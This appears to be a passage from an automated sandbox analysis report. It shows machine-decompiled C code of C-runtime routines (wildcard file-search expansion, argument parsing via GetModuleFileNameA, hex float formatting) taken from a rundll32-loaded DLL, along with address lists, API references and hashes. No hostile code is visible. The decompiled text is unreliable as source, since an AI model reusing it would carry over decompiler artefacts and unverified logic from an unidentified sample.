									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E6E208956();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E6E20FB55(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E6E21D133(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E6E218865(_a12, __eflags, _t213);
													E6E20FBB2(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E6E21D133(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E208956();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x6e24b164; // 0x1dc3c76f
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E6E21E070(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E6E2057E0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E6E21DC90(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E6E21847E);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E6E203D51(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E6E20FBB2(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E6E21E030( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E6E218840( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E6E20BB7E();
					_t219 = 0x16;
					 *_t148 = _t219;
					E6E208929();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}





















































































    0x6e21849b
    0x6e21849e
    0x6e2184a4
    0x6e2184bc
    0x6e2184bf
    0x6e2184c3
    0x6e2184c5
    0x6e2184c7
    0x6e2184c9
    0x6e2184cc
    0x6e2184cf
    0x6e2184d2
    0x6e2184d4
    0x6e21852c
    0x6e21852c
    0x6e218532
    0x6e218534
    0x6e21853f
    0x6e218543
    0x6e218545
    0x6e218548
    0x6e21854c
    0x6e21854c
    0x6e21854e
    0x6e218550
    0x6e218552
    0x6e218554
    0x6e218554
    0x6e218556
    0x6e218559
    0x6e21855c
    0x6e21855c
    0x6e21855e
    0x6e21855f
    0x6e21855f
    0x6e21856a
    0x6e21856c
    0x6e21856f
    0x6e218570
    0x6e218573
    0x6e218573
    0x6e218577
    0x6e21857a
    0x6e21857d
    0x6e21857d
    0x6e21858b
    0x6e21858d
    0x6e218590
    0x6e218592
    0x6e21859c
    0x6e21859f
    0x6e2185a2
    0x6e2185a4
    0x6e2185a7
    0x6e2185a9
    0x6e2185f9
    0x6e2185fc
    0x6e2185fc
    0x6e2185fe
    0x00000000
    0x6e2185ab
    0x6e2185ad
    0x6e2185ad
    0x6e2185af
    0x6e2185b2
    0x6e2185b2
    0x6e2185b7
    0x6e2185ba
    0x6e2185ba
    0x6e2185bc
    0x6e2185bd
    0x6e2185bd
    0x6e2185c1
    0x6e2185c4
    0x6e2185c4
    0x6e2185c7
    0x6e2185ca
    0x6e2185d7
    0x6e2185dc
    0x6e2185df
    0x6e2185e1
    0x6e21861b
    0x6e21861c
    0x6e21861d
    0x6e21861e
    0x6e21861f
    0x6e218620
    0x6e218625
    0x6e218629
    0x6e21862b
    0x6e21862c
    0x6e21862f
    0x6e21862f
    0x6e218632
    0x6e218632
    0x6e218634
    0x6e218635
    0x6e218635
    0x6e21863e
    0x6e21863f
    0x6e218642
    0x6e218645
    0x6e218648
    0x6e21864a
    0x6e218651
    0x6e218653
    0x6e218656
    0x6e218660
    0x6e218663
    0x6e218664
    0x6e218666
    0x6e21867a
    0x6e21867a
    0x6e21867d
    0x6e218687
    0x6e21868c
    0x6e21868f
    0x6e218691
    0x00000000
    0x6e218693
    0x6e218697
    0x6e2186a0
    0x6e2186a6
    0x00000000
    0x6e2186a9
    0x6e218668
    0x6e218668
    0x6e21866e
    0x6e218673
    0x6e218676
    0x6e218678
    0x6e2186af
    0x6e2186b1
    0x6e2186b2
    0x6e2186b3
    0x6e2186b4
    0x6e2186b5
    0x6e2186b6
    0x6e2186bb
    0x6e2186be
    0x6e2186bf
    0x6e2186c1
    0x6e2186c7
    0x6e2186ce
    0x6e2186d1
    0x6e2186d4
    0x6e2186d5
    0x6e2186d8
    0x6e2186d9
    0x6e2186dc
    0x6e2186dd
    0x6e2186fe
    0x6e2186fe
    0x6e218700
    0x00000000
    0x00000000
    0x6e2186e5
    0x6e2186e7
    0x6e2186e9
    0x6e2186eb
    0x6e2186ed
    0x6e2186ef
    0x6e2186f1
    0x6e2186fc
    0x00000000
    0x6e2186fc
    0x6e2186f1
    0x6e2186ed
    0x00000000
    0x6e2186e9
    0x6e218702
    0x6e218704
    0x6e218707
    0x6e218720
    0x6e218720
    0x6e218722
    0x6e218725
    0x6e218735
    0x6e218737
    0x6e218737
    0x6e218727
    0x6e218727
    0x6e21872a
    0x00000000
    0x6e21872c
    0x6e21872c
    0x6e21872f
    0x00000000
    0x6e218731
    0x6e218731
    0x6e218731
    0x6e21872f
    0x6e21872a
    0x6e218745
    0x6e218749
    0x6e218757
    0x6e21875c
    0x6e218771
    0x6e218773
    0x6e218779
    0x6e21877c
    0x6e2187ae
    0x6e2187ae
    0x6e2187b3
    0x6e2187b9
    0x6e2187b9
    0x6e2187c0
    0x6e2187da
    0x6e2187da
    0x6e2187db
    0x6e2187e1
    0x6e2187e7
    0x6e2187e8
    0x6e2187e9
    0x6e2187ee
    0x6e2187f1
    0x6e2187f3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2187c2
    0x6e2187c2
    0x6e2187c8
    0x6e2187ca
    0x00000000
    0x6e2187cc
    0x6e2187cc
    0x6e2187cf
    0x00000000
    0x6e2187d1
    0x6e2187d1
    0x6e2187d8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2187d8
    0x6e2187cf
    0x6e2187ca
    0x00000000
    0x6e2187f5
    0x6e2187fd
    0x6e218803
    0x6e218805
    0x6e218805
    0x6e21880d
    0x6e218812
    0x6e21881a
    0x6e21881d
    0x6e21881f
    0x6e218833
    0x6e218838
    0x6e21877e
    0x6e21877e
    0x6e21877f
    0x6e218780
    0x6e218781
    0x6e218782
    0x6e21878a
    0x6e21878a
    0x6e21878a
    0x6e21878c
    0x6e21878f
    0x6e218792
    0x6e218792
    0x6e218709
    0x6e21870c
    0x6e21870e
    0x00000000
    0x6e218710
    0x6e218710
    0x6e218713
    0x6e218714
    0x6e218715
    0x6e218716
    0x6e21871b
    0x6e21870e
    0x6e21879a
    0x6e21879f
    0x6e2187aa
    0x00000000
    0x00000000
    0x00000000
    0x6e218678
    0x6e21864c
    0x6e21864e
    0x6e2186aa
    0x6e2186ae
    0x6e2186ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2185e3
    0x6e2185e6
    0x6e2185e9
    0x6e2185ec
    0x6e2185ef
    0x6e2185f2
    0x6e2185f5
    0x6e2185f5
    0x00000000
    0x6e2185b2
    0x6e218594
    0x6e218594
    0x6e218600
    0x6e218602
    0x00000000
    0x6e218607
    0x6e2184d6
    0x6e2184d6
    0x6e2184d9
    0x6e2184e2
    0x6e2184e5
    0x6e2184ec
    0x6e2184ee
    0x6e218507
    0x6e218508
    0x6e218509
    0x6e21850b
    0x6e218510
    0x6e2184f0
    0x6e2184f0
    0x6e2184f3
    0x6e2184f4
    0x6e2184f6
    0x6e2184f8
    0x6e2184fa
    0x6e2184ff
    0x6e2184ff
    0x6e218513
    0x6e218515
    0x6e218517
    0x00000000
    0x00000000
    0x6e21851d
    0x6e218520
    0x6e218522
    0x6e218524
    0x00000000
    0x6e218526
    0x6e218526
    0x6e218529
    0x00000000
    0x6e218529
    0x00000000
    0x6e218524
    0x6e218608
    0x6e21860b
    0x6e218610
    0x00000000
    0x6e218613
    0x6e2184a6
    0x6e2184a6
    0x6e2184ad
    0x6e2184ae
    0x6e2184b0
    0x6e2184b5
    0x6e218614
    0x6e218618
    0x6e218618
    0x00000000

    APIs
    • _strpbrk.LIBCMT ref: 6E2184E5
    • _free.LIBCMT ref: 6E218602
      • Part of subcall function 6E208956: IsProcessorFeaturePresent.KERNEL32(00000017,6E208928,00000000,00000000,00000000,6E208935,?,00000016,?,?,6E208935,00000000,00000000,00000000,00000000,00000000), ref: 6E208958
      • Part of subcall function 6E208956: GetCurrentProcess.KERNEL32(C0000417,00000000,00000000,00000000,00000000,6E20D6CB,00000000,?,00000003,6E20FA89), ref: 6E20897A
      • Part of subcall function 6E208956: TerminateProcess.KERNEL32(00000000,?,00000003,6E20FA89,?,?,?,?,?,?,?,6E200044), ref: 6E208981
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
    • String ID: *?$.
    • API String ID: 2812119850-3972193922
    • Opcode ID: 0afd5cdead393887c651df3c09560e4e72948fa99440ffc137417b77094c0f6d
    • Instruction ID: 728ec1b7dd6836a3552446c13bcac35bb1dda6f44c56c2fb52178aa8353bd396
    • Opcode Fuzzy Hash: 0afd5cdead393887c651df3c09560e4e72948fa99440ffc137417b77094c0f6d
    • Instruction Fuzzy Hash: 47517F75E0810EAFDB18CFE8C880AEEBBFAEF48314F254569D654E7344E6719A018B50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20E0C2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E6E20E0C2(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E6E218E06(_t52);
					GetModuleFileNameA(0, 0x6e2e3568, 0x104);
					_t49 =  *0x6e2e3a9c; // 0x2b03468
					 *0x6e2e3aa4 = 0x6e2e3568;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x6e2e3568;
					}
					_v8 = 0;
					_v16 = 0;
					E6E20E1E6(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E6E20E35B(_v8, _v16, 1);
					if(_t64 != 0) {
						E6E20E1E6(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E6E218921(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x6e2e3a90 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x6e2e3a94 = _t59;
									L16:
									E6E20FBB2(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x6e2e3a90 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x6e2e3a94 = _t43;
						goto L10;
					} else {
						_t44 = E6E20BB7E();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E6E20FBB2(_t64);
						return _t50;
					}
				} else {
					_t45 = E6E20BB7E();
					_t65 = 0x16;
					 *_t45 = _t65;
					E6E208929();
					return _t65;
				}
			}





















    0x6e20e0c2
    0x6e20e0cf
    0x6e20e0ef
    0x6e20e102
    0x6e20e108
    0x6e20e10e
    0x6e20e116
    0x6e20e11d
    0x6e20e11d
    0x6e20e122
    0x6e20e129
    0x6e20e130
    0x6e20e142
    0x6e20e149
    0x6e20e168
    0x6e20e174
    0x6e20e18f
    0x6e20e192
    0x6e20e199
    0x6e20e19f
    0x6e20e1a6
    0x6e20e1a9
    0x6e20e1ab
    0x6e20e1af
    0x6e20e1b9
    0x6e20e1b9
    0x6e20e1bb
    0x6e20e1c1
    0x6e20e1c4
    0x6e20e1c6
    0x6e20e1cc
    0x6e20e1cd
    0x6e20e1d3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20e1b1
    0x6e20e1b1
    0x6e20e1b1
    0x6e20e1b4
    0x6e20e1b5
    0x00000000
    0x6e20e1b1
    0x6e20e1a1
    0x00000000
    0x6e20e1a1
    0x6e20e17a
    0x6e20e17f
    0x6e20e181
    0x6e20e183
    0x00000000
    0x6e20e14b
    0x6e20e14b
    0x6e20e150
    0x6e20e152
    0x6e20e153
    0x6e20e188
    0x6e20e188
    0x6e20e1d6
    0x6e20e1d7
    0x00000000
    0x6e20e1e0
    0x6e20e0d7
    0x6e20e0d7
    0x6e20e0de
    0x6e20e0df
    0x6e20e0e1
    0x00000000
    0x6e20e0e6

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 6E20E102
    • _free.LIBCMT ref: 6E20E1CD
    • _free.LIBCMT ref: 6E20E1D7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Windows\SysWOW64\rundll32.exe
    • API String ID: 2506810119-2837366778
    • Opcode ID: 1741fcc4a12d32d01fbf0d6f254e7d280e242cec2b6372489d1d6fad5c7c1b3d
    • Instruction ID: 66c9b7aeae0230802843fd3a01861a637c12738564c84290cda7236ee641295b
    • Opcode Fuzzy Hash: 1741fcc4a12d32d01fbf0d6f254e7d280e242cec2b6372489d1d6fad5c7c1b3d
    • Instruction Fuzzy Hash: A2319075A0461DAFDF21DFD99888D9EFBFEEB85311B1440A6E804A7380D7708E80CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E210880, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E6E210880(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E209118(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E21F630( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E21F630( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E2057E0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E21F630( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E21F530();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E21F530();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E21F530();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E210B83(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E21F710(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E20BB7E();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E208929();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































    0x6e210880
    0x6e21088b
    0x6e210892
    0x6e210894
    0x6e210894
    0x6e210896
    0x6e21089f
    0x6e2108a1
    0x6e2108a6
    0x6e2108ac
    0x6e2108c2
    0x6e2108c7
    0x6e2108ca
    0x6e2108d7
    0x6e2108dc
    0x6e210930
    0x6e210938
    0x6e21093a
    0x6e21093c
    0x6e21093f
    0x6e21093f
    0x6e21093f
    0x6e210945
    0x6e21094d
    0x6e210960
    0x6e210963
    0x6e210965
    0x6e210968
    0x6e210969
    0x6e21098a
    0x6e21098d
    0x6e21098d
    0x6e21096b
    0x6e21096b
    0x6e21096d
    0x6e210978
    0x6e210978
    0x6e21097a
    0x6e210981
    0x6e21097c
    0x6e21097c
    0x6e21097c
    0x6e21097a
    0x6e21098e
    0x6e210990
    0x6e210991
    0x6e210994
    0x6e210996
    0x6e2109a0
    0x6e2109aa
    0x6e210998
    0x6e210998
    0x6e210998
    0x6e2109af
    0x6e2109af
    0x6e2109b4
    0x6e2109b7
    0x6e2109c2
    0x6e2109c2
    0x6e2109c2
    0x6e2109c2
    0x6e2109c6
    0x6e2109cd
    0x6e2109ce
    0x6e2109d1
    0x6e2109d4
    0x6e2109d4
    0x6e2109d6
    0x00000000
    0x00000000
    0x6e2109ee
